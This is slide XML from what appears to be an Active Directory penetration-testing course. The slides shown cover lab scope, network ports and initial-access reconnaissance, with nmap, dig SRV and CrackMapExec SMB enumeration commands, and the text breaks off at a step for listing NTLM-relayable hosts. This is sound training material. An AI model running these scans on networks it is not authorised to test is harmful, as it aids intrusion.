              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>= P:3389 - Remote desktop protocol, for virtual desktop access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IPv6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= IPv4 counterpart, larger address space, mostly unused in internal networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = P:88 - Authentication protocol, will be touched on later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WMI/RPC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= P:135/139 - Windows management protocols, can perform almost all actions needed to interact with a machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3156851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Precursor &gt; Environment Notes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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97807"/>
            <a:ext cx="8580317" cy="3865887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Scripts:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>/opt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>directory there are tools that we have predownloaded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Scope:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>172.16.14.192/26</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201930" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3317395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3AC8-D532-9CD0-EFCF-AB811A3110F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197884" y="1772162"/>
            <a:ext cx="4604507" cy="1093171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:latin typeface="IBM Plex Sans Light"/>
              </a:rPr>
              <a:t>Initial Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2281001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No AD Access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8450" y="655151"/>
            <a:ext cx="8533345" cy="3513490"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>GOALS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Understand the environment </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Situational Awareness </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Enumeration  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Map important hosts and services </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Gain initial foothold into Active Directory </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Domain User account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Domain Machine account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310973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a:t>Initial Access &gt; No AD Access &gt; DHCP/DNS Recon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9120" y="632061"/>
            <a:ext cx="8578857" cy="4119365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>DHCP Discover broadcast packet -&gt; DHCP Offer response from domain's DHCP server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>DHCP/DNS server IP, Domain Name, IP, Subnet mask, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --script broadcast-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dhcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>-discover</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>AD relies on SRV records for service discovery. These can be queried via dig or via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> to produce a list of domain controllers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dig  -t SRV _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>gc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>._</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>tcp.domain.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dig  -t SRV _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>._</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>tcp.domain.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dig  -t SRV _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>._</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>tcp.domain.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dig  -t SRV _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>kpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>._</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>tcp.domain.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" err="1">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dns-srv-enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dns-srv-enum.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>='&lt;domain&gt;'" </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="672573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A42F-B12F-1544-8F90-81469B16E3AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agenda </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{025D272A-4898-1045-91C2-3F1CBF02D114}"/>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C8C9BCCB-B79E-B148-8C12-863528FB1670}"/>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5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F23946-0191-9A45-97E8-76C1AF639A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165287" y="798523"/>
            <a:ext cx="4187952" cy="3008376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Precursor </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Initial Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>AD Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Post-Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>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24613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Initial Access &gt; No AD Access &gt; SMB Recon</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673964"/>
            <a:ext cx="6100765" cy="3954958"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SMB Enumeration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SMB Share (null, anonymous)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SMB version, SMB Signing requirement, Hostname, OS, SMBv1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>CrackMapExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>cme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> 172.16.14.192/26</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Generate NTLM (SMB) Relay-able host list </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
